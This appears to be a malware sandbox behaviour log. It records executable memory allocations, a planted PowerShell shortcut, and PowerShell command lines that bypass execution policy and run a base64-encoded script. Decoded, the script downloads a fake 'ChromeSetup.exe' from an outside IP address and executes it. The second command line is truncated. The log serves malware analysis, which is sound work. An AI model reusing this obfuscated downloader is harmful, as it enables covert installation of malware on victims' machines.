NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bfe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bff000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c03000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c04000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BypAsS -nop -W 1 -ec IAAJAAkAIAAJAAkAIABbAG4ARQB0AC4AcwBlAFIAdgBpAEMAZQBwAE8AaQBuAFQAbQBhAG4AQQBHAGUAUgBdADoAOgBTAGUAQwBVAHIASQB0AFkAUAByAG8AdABPAGMATwBsACAACQAJAAkACQAJAAkACQAJAAkACQAJAD0AIAAgACAAIAAgACAAIAAgAFsATgBlAHQALgBzAGUAYwBVAFIAaQB0AHkAcABSAE8AVABPAEMAbwBMAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAJACAACQAgAAkACQAJAAkAIAAgAAkAIAAJAAkAIABXAGcAZQBUACAAIAAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAOAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAGgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABhAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANgA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADgAMwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAyACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADIAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAE8AVQB0AGYAaQBsAGUAIAAgACAAIAAgACAAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0gIAAJAAkACQAJAAkACQAJAAkACQAJAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAFQAYQByAHQAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAVABlAG0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0g
cmdline	"C:\Windows\SYSTeM32\winDOWsPoWersheLL\v1.0\poWeRshElL.exe" "PowErShell -ex BypAsS -nop -W 1 -ec IAAJAAkAIAAJAAkAIABbAG4ARQB0AC4AcwBlAFIAdgBpAEMAZQBwAE8AaQBuAFQAbQBhAG4AQQBHAGUAUgBdADoAOgBTAGUAQwBVAHIASQB0AFkAUAByAG8AdABPAGMATwBsACAACQAJAAkACQAJAAkACQAJAAkACQAJAD0AIAAgACAAIAAgACAAIAAgAFsATgBlAHQALgBzAGUAYwBVAFIAaQB0AHkAcABSAE8AVABPAEMAbwBMAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAJACAACQAgAAkACQAJAAkAIAAgAAkAIAAJAAkAIABXAGcAZQBUACAAIAAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAOAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAGgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABhAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANgA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADgAMwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAyACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAAC